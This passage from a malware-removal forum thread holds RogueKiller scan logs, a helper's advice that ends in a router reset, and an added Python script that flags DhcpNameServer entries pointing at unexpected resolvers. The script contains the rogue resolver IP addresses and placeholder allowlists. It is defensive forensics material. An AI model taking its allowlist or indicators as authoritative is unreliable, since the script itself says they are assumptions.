[PUM.StartMenu] (X86) HKEY_USERS\S-1-5-21-2870111626-1301175785-2031466506-1000-{ED1FC765-E35E-4C3D-BF15-2C2B11260CE4}-0\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced | Start_TrackProgs : 0  -> Found
[PUM.StartMenu] (X64) HKEY_USERS\S-1-5-21-2870111626-1301175785-2031466506-1002\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced | Start_TrackProgs : 0  -> Found
[PUM.StartMenu] (X86) HKEY_USERS\S-1-5-21-2870111626-1301175785-2031466506-1002\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced | Start_TrackProgs : 0  -> Found
[PUM.StartMenu] (X64) HKEY_USERS\S-1-5-21-2870111626-1301175785-2031466506-1002-{ED1FC765-E35E-4C3D-BF15-2C2B11260CE4}-0\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced | Start_TrackProgs : 0  -> Found
[PUM.StartMenu] (X86) HKEY_USERS\S-1-5-21-2870111626-1301175785-2031466506-1002-{ED1FC765-E35E-4C3D-BF15-2C2B11260CE4}-0\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced | Start_TrackProgs : 0  -> Found
 
¤¤¤ Tasks : 0 ¤¤¤
 
¤¤¤ Files : 0 ¤¤¤
 
¤¤¤ Hosts File : 0 ¤¤¤
 
¤¤¤ Antirootkit : 0 (Driver: Not loaded [0xc000036b]) ¤¤¤
 
¤¤¤ Web browsers : 0 ¤¤¤
 
¤¤¤ MBR Check : ¤¤¤
+++++ PhysicalDrive0: ST1000LM024 HN-M101MBB +++++
--- User ---
[MBR] 7469b54249d2406ac14f7d7c22138d9d
[BSP] 73c3af7b8366531e03277fe14d3640cb : Linux|VT.Unknown MBR Code
Partition table:
0 - EF | Offset (sectors): 2048 | Size: 200 MB
1 - Mi | Offset (sectors): 411648 | Size: 128 MB
2 -  | Offset (sectors): 673792 | Size: 839700 MB
3 -  | Offset (sectors): 1817037824 | Size: 41043 MB
4 - [SYSTEM] Ba | Offset (sectors): 1901094912 | Size: 25600 MB
5 -  | Offset (sectors): 1720381440 | Size: 1 MB
6 -  | Offset (sectors): 1720383488 | Size: 39043 MB
7 -  | Offset (sectors): 1800343552 | Size: 8151 MB
User = LL1 ... OK
User = LL2 ... OK
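The three [PUM.Dns] lines in the RogueKiller logs (post #7 and again above) are the one finding in this thread that survives every cleanup, and the value name explains why: DhcpNameServer is what the DHCP server hands out with each lease, so deleting it from the registry only lasts until the next renewal, and its presence in ControlSet001 and ControlSet002 as well as CurrentControlSet shows it has been there across reboots. That points at the device issuing the lease, which is where the thread ends up (the router reset in post #14). The Python below is an added example written for this page, not code from the thread or from RogueKiller, that parses those lines and applies that reasoning. The sample log is the three lines quoted from the post; the resolver allowlist is an assumption, since the thread never says which resolvers the ISP normally assigns.

```python
import ipaddress
import re
from typing import Dict, List

# The three [PUM.Dns] lines exactly as RogueKiller printed them in the post above.
SAMPLE_LOG = r"""
[PUM.Dns] (X64) HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\Tcpip\Parameters\Interfaces\{645D432C-2FCC-424B-BDBD-E537EB70D94A} | DhcpNameServer : 188.59.248.108 86.108.132.165 ([X][-])  -> Found
[PUM.Dns] (X64) HKEY_LOCAL_MACHINE\System\ControlSet001\Services\Tcpip\Parameters\Interfaces\{645D432C-2FCC-424B-BDBD-E537EB70D94A} | DhcpNameServer : 188.59.248.108 86.108.132.165 ([TURKEY (TR)][-])  -> Found
[PUM.Dns] (X64) HKEY_LOCAL_MACHINE\System\ControlSet002\Services\Tcpip\Parameters\Interfaces\{645D432C-2FCC-424B-BDBD-E537EB70D94A} | DhcpNameServer : 188.59.248.108 86.108.132.165 ([TURKEY (TR)][-])  -> Found
"""

# Assumption: public resolvers this network is allowed to use. The thread never says what the
# ISP normally hands out, so these are placeholders an operator would replace with the real list.
EXPECTED_RESOLVERS = [ipaddress.ip_network(n) for n in ("8.8.8.8/32", "8.8.4.4/32", "1.1.1.1/32")]

PUM_DNS_RE = re.compile(
    r"\[PUM\.Dns\]\s+\((?P<arch>X86|X64)\)\s+"
    r"HKEY_LOCAL_MACHINE\\System\\(?P<controlset>[^\\]+)\\Services\\Tcpip\\Parameters\\Interfaces\\"
    r"(?P<iface>\{[0-9A-Fa-f-]+\})\s+\|\s+(?P<value>\w+)\s+:\s+"
    r"(?P<servers>[\d. ]+?)\s+\(\[(?P<geo>[^\]]*)\]"
)


def parse_pum_dns(log_text: str) -> List[Dict[str, object]]:
    """Extract each [PUM.Dns] finding: control set, interface GUID, value name and resolver IPs."""
    findings = []
    for line in log_text.splitlines():
        m = PUM_DNS_RE.search(line)
        if not m:
            continue
        findings.append({
            "controlset": m.group("controlset"),
            "iface": m.group("iface"),
            "value": m.group("value"),  # DhcpNameServer = leased; NameServer = set by hand
            "servers": [str(ipaddress.ip_address(s)) for s in m.group("servers").split()],
            "geo": m.group("geo"),
        })
    return findings


def is_expected(server: str) -> bool:
    """A LAN address is normally the router forwarding DNS; any other resolver must be on the allowlist."""
    addr = ipaddress.ip_address(server)
    return addr.is_private or any(addr in net for net in EXPECTED_RESOLVERS)


def triage(findings: List[Dict[str, object]]) -> Dict[str, Dict[str, object]]:
    """Group findings per interface and decide where a rogue resolver is being set from."""
    report: Dict[str, Dict[str, object]] = {}
    for f in findings:
        entry = report.setdefault(f["iface"], {
            "servers": set(), "unexpected": set(), "control_sets": set(), "dhcp_supplied": False,
        })
        entry["servers"].update(f["servers"])
        entry["control_sets"].add(f["controlset"])
        entry["unexpected"].update(s for s in f["servers"] if not is_expected(s))
        if f["value"] == "DhcpNameServer":
            entry["dhcp_supplied"] = True
    for entry in report.values():
        if not entry["unexpected"]:
            entry["verdict"] = "ok"
        elif entry["dhcp_supplied"]:
            # Leased from the DHCP server: deleting the value lasts until the next renewal,
            # so the fix belongs on the device issuing the lease (the router, in this thread).
            entry["verdict"] = "rogue-dns-via-dhcp"
        else:
            entry["verdict"] = "rogue-dns-static"
        # Present in ControlSet001/002 as well as CurrentControlSet: it survived reboots.
        entry["persisted_across_boots"] = len(entry["control_sets"]) > 1
    return report


if __name__ == "__main__":
    for iface, entry in triage(parse_pum_dns(SAMPLE_LOG)).items():
        print(iface, entry["verdict"], sorted(entry["unexpected"]), sorted(entry["control_sets"]))
```

Run against the quoted lines it reports rogue-dns-via-dhcp for the one interface, with both resolvers outside the allowlist and the value present in all three control sets. A static NameServer entry would get rogue-dns-static instead, which is the case where editing the registry (or the adapter's DNS settings) actually fixes something.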


#10 nasdaq (Malware Response Team, 38,594 posts, Montreal, QC, Canada)

Posted 13 December 2015 - 08:30 AM

This could be the culprit.

KMPlayer has been found to be bundled with 3rd-party software. If you have not purposefully installed it, you should be safe uninstalling it.

http://www.shouldiremoveit.com/The-KMPlayer-7011-program.aspx

Are the popups in all your browsers or just one of them?

p.s.
You can remove it via the Control Panel > Programs and Features applet.
The KMPlayer (remove only) (HKLM-x32\...\The KMPlayer) (Version: 3.8.0.121 - PandoraTV)

Keep me posted.

#11 itucs (Topic Starter, Members, 9 posts)

Posted 13 December 2015 - 09:20 AM

Hello nasdaq,

I have been using KMPlayer for nearly 3 years. I uninstalled it anyway, but it didn't solve the problem. Just to clear something up: the popups are not in the browser. The popups I get are from the antivirus software; I get them from Malwarebytes and Kaspersky. I attached images of the popups to the first post; I will post more detailed screenshots of the issue in this post. When I browse the internet it blocks some connections by the browser, when I try to play a game it blocks some connections by Steam, and when the computer is idle and no active programs are running it blocks some connections by svchost.exe. You can view the attached screenshots and get a more detailed look at it.

Best,

Arda

Attached Files



#12 nasdaq (Malware Response Team, 38,594 posts, Montreal, QC, Canada)

Posted 13 December 2015 - 01:45 PM


Please run this tool and post the log.

--RogueKiller--
  • Download RogueKiller & SAVE it to your Desktop.
  • Quit all programs that you may have started.
  • Please disconnect any USB or external drives from the computer before you run this scan!
  • For Vista or Windows 7, right-click and select "Run as Administrator" to start.
  • For Windows XP, double-click to start.
  • Wait until the Prescan has finished...
  • When instructed, click on the "Scan" button.
  • Wait until the Status box shows "Scan Finished".
  • Click on "Report".
  • Click on the Export TXT button and save the file as RogueReport.txt.
  • The file RogueReport.txt will be saved on the desktop.
  • Close the program.
  • Open the file with Notepad and copy/paste the content into your next reply.
<<<>>>

#13 itucs (Topic Starter, Members, 9 posts)

Posted 13 December 2015 - 03:11 PM

Hello nasdaq,

I think you forgot we tried that yesterday. You can check post #7 and post #9 in this topic for a recap. As I said in post #9, after the deletion of the threats I ran it again and it didn't find any more threats. I redid it now just to follow your instructions again, but it is no big surprise that the result is the same: no threats. You can check the log below if you want, but I don't think there is a lot to check.

 

RogueKiller V11.0.2.0 [Dec  7 2015] (Free) by Adlice Software
 
Operating System : Windows 7 (6.1.7601 Service Pack 1) 64 bits version
Started in : Normal mode
User : Arda [Administrator]
Started from : C:\Users\Arda\Desktop\RogueKiller.exe
Mode : Scan -- Date : 12/13/2015 22:05:32
 
¤¤¤ Processes : 0 ¤¤¤
 
¤¤¤ Registry : 0 ¤¤¤
 
¤¤¤ Tasks : 0 ¤¤¤
 
¤¤¤ Files : 0 ¤¤¤
 
¤¤¤ Hosts File : 0 ¤¤¤
 
¤¤¤ Antirootkit : 0 (Driver: Not loaded [0xc000036b]) ¤¤¤
 
¤¤¤ Web browsers : 0 ¤¤¤
 
¤¤¤ MBR Check : ¤¤¤
+++++ PhysicalDrive0: ST1000LM024 HN-M101MBB +++++
--- User ---
[MBR] 7469b54249d2406ac14f7d7c22138d9d
[BSP] 73c3af7b8366531e03277fe14d3640cb : Linux|VT.Unknown MBR Code
Partition table:
0 - EF | Offset (sectors): 2048 | Size: 200 MB
1 - Mi | Offset (sectors): 411648 | Size: 128 MB
2 -  | Offset (sectors): 673792 | Size: 839700 MB
3 -  | Offset (sectors): 1817037824 | Size: 41043 MB
4 - [SYSTEM] Ba | Offset (sectors): 1901094912 | Size: 25600 MB
5 -  | Offset (sectors): 1720381440 | Size: 1 MB
6 -  | Offset (sectors): 1720383488 | Size: 39043 MB
7 -  | Offset (sectors): 1800343552 | Size: 8151 MB
User = LL1 ... OK
User = LL2 ... OK


#14 nasdaq (Malware Response Team, 38,594 posts, Montreal, QC, Canada)

Posted 14 December 2015 - 08:53 AM

Sorry about that double post.

Reset your router. It may be infected.

How to Reset a Router Back to the Factory Default Settings
http://www.ehow.com/how_2110924_reset-back-factory-default-settings.html

Then, please reconfigure it back to your preferred settings. Below is a list of default usernames and passwords, should you not know yours ;)

http://www.routerpasswords.com/
http://www.phenoelit-us.org/dpl/dpl.html
===

Reset for Linksys, Netgear, D-Link and Belkin Routers
http://www.techsupportforum.com/2763-reset-for-linksys-netgear-d-link-and-belkin-routers/

====
How to tell if my Wireless is secure.
http://www.ehow.com/how_6775466_tell-wireless-secure_.html

#15 itucs (Topic Starter, Members, 9 posts)

Posted 14 December 2015 - 10:39 AM

Hello nasdaq,
 
That was a lifesaver. It solved the problem instantly. I hadn't been able to connect to my default gateway for a while to change my router settings, and I thought that this was a problem caused by the trojan, not the other way around, obviously. I didn't know that a router could be infected at all.
 
I have spent so many hours trying to fix this and could have spent many more before I even considered doing what you suggested. I hope it won't come back and I won't have to post here again. Thank you for all your support and valuable advice. I really appreciate it.
 
Best regards,
 
Arda




